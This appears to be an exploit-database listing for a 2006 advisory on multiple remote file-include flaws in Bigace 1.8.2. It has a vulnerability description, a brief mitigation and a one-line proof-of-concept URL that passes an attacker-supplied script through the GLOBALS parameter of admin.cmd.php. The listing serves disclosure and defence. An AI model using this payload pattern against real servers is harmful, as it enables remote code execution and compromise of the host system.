header-logo
Suggest Exploit
vendor:
Bigace
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File-Include
94
CWE
Product Name: Bigace
Affected Version From: 1.8.2002
Affected Version To: 1.8.2002
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Bigace Multiple Remote File-Include Vulnerabilities

Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote PHP code and execute it in the context of the webserver process. A successful exploit may lead to a compromise of the underlying system; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19723/info
   
Bigace is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
   
An attacker can exploit these issues to include arbitrary remote PHP code and execute it in the context of the webserver process. 
   
A successful exploit may lead to a compromise of the underlying system; other attacks are also possible.
   
Version 1.8.2 of Bigace is known to be vulnerable; previous versions may be affected as well.

http://www.example.com/[Bigace]/system/command/admin.cmd.php?GLOBALS=[Evil Script]